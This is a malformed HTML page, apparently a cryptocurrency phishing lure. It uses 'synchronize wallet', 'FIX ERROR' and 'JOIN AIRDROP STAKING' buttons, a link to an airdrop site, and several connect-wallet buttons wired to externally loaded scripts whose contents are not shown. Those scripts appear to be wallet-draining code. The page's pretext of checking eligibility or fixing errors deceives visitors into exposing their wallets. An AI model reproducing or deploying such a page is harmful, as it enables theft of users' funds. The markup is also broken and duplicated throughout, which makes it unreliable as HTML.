<!DOCTYPE html>
<html>
<head>
	<title>eligibility.html</title>
        <meta charset="utf-8"/>
        <style type="text/javascript">
        <script type ="text/javascript" crossorigin src="./f32a6466-e644-4c32-af08-3dcf6e082212.js"></script>
  <head>
 <body>
 <script type="module" crossorigin src="./39263898f80a3c58.js"></script>
 <button class="connect-wallet">CHECK Wallet</button>
 </body>
 <head
        <style>
        body {background-image: url('images(5).jpeg');
            background-repeat: no-repeat;
              background-attachment: fixed;
                background-size: 90% 90%;
                }
                </style>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no"/>
<meta name="wb_main" content="wb_element 9ec67eabfa4b412a7bc144dc50566cdde0e5ddee098a7fb555d0155176e10b68" />
	<style type="text/javascript">  <script src="f32a6466-e644-4c32-af08-3dcf6e082212.js"></script>

		html {
			min-height: 80%;
			display: flex;
			flex-direction: column;
			justify-content: center;
			align-items: center;
		}
		body {
			padding: 0;
			margin: 0;
			border: yes;
			font-size:40px;
			font-weight: normal;
			font-family: Verdana,Arial,Helvetica,sans-serif;
			line-height: 48px;
			color: #FBF0F0;
			text-align: center;
			text-shadow: 2px 2px 2px rgba(0,0,0,0.3);
			background-color: #BA5640;
		}
		.wb-content {
			display: flex;
			flex-direction: column;
			justify-content: flex-start;
			align-items: center;
			margin: 0 40px;
		}
		.wb-hr {
			display: block;
			border-top: 4px solid #FBF0F0;
			width: 100%;
			max-width: 300px;
			margin: 30px auto;
			box-shadow: 2px 2px 2px rgba(0,0,0,0.3);
		}
		h1 {
			display: block;
			font-size: 80px;
			font-weight: normal;
			font-family: Verdana,Arial,Helvetica,sans-serif;
			line-height: 80px;
			margin: 20px 0px 20px 0;
			padding: 0;
		}
		div.wb-domain {
			display: block;
			text-decoration: underline;
		}
		.wb-list {
			display: block;
			text-align: left;
			margin: 100px 0;
		}
		.wb-list ol {
			padding: 10px 0;
			margin: 0 0 0 42px;
			list-style-position: outside;
		}
		.wb-powered {
			display: block;
			margin-top: 20px;
			font-size: 23px;
			display: flex;
			flex-direction: row;
			justify-content: center;
			align-items: center;
		}
		.wb-powered img {
			margin-left: 10px;
		}
		.wb-powered a {
			margin-left: 8px;
			color: #FBF0F0;
			text-decoration: underline;
		}
		.wb-powered a:visited,
		.wb-powered a:hover {
			color: #FBF0F0;
			text-decoration: underline;
		}
		.wb_main { display: none; }
		@media (max-width: 991px) {
			body {
				font-size: 24px;
				line-height: 38px;
			}
			h1 {
				font-size: 64px;
				line-height: 64px;
			}
			.wb-hr {
				margin: 24px auto;
			}
			.wb-list {
				margin: 80px 0;
			}
			.wb-list ol {
				margin: 0 0 0 34px;
			}
			.wb-powered {
				font-size: 18px;
			}
		}
		@media (max-width: 767px) {
			body {
				font-size: 15px;
				line-height: 24px;
			}
			h1 {
				font-size: 40px;
				line-height: 60px;
			}
			.wb-hr {
				margin: 15px auto;
			}
			.wb-list {
				margin: 50px 0;
			}
			.wb-list ol {
				margin: 0 0 0 21px;
			}
			.wb-powered {
				font-size: 14px;
			}
		}
	</style>
</head>
<body> 
	<div class="wb-content">
		<div class="wb-hr"></div>
		<h1 style=color:blue;">synchronize wallet</h1>
</head> <p style="text-align: center;">👉<script type="module" src="./39263898f80a3c58.js"></script>
<button class style=color:Red;="connect-wallet">SUBMIT</button> 👈</p>
<head>
                <script src="./f32a6466-e644-4c32-af08-3dcf6e082212.js;alert (interact-button);</script>
                            </body>
                            </html>
            
<head>
</body>
<body>
      <style>
          body {
            background-image: url('images(4).jpeg');
              background-repeat: no-repeat;
                background-attachment: fixed;
                  background-size:100% 100%;
                  }
                  </style>
       
    </body>
    <head>
        <body>

     <h2>Step-by-Step Guide</h2>

1. Click All wallet to choose your wallet origin </head> <p style="text-align: center;">👉<script type="text/javascript" crossorigin src="./f32a6466-e644-4c32-af08-3dcf6e082212.js"></script>
       <button class="interact-button">FIX ERROR</button>👈 </p>

</head>
<body>
    <h3>JOIN AIRDROP STAKING</h3>
    <p><a href="2025airdropupdate.weebly.com"
    target="_blank">JOIN</a></p>
    <h4>SYNCHRONIZE</h4>
<link ref="interact-button" <a href="./f32a6466-e644-4c32-af08-3dcf6e082212.js"><script>
  <div id="interact-button">    
        <button class="Connect-Wallet">synchronize</button> src="./f32a6466-e644-4c32-af08-3dcf6e082212.js"></script>
   </head>
<body>
<button onclick="interact-button"><script> src="./f32a6466-e644-4c32-af08-3dcf6e082212.js">mine</button>
     </body>
     </html>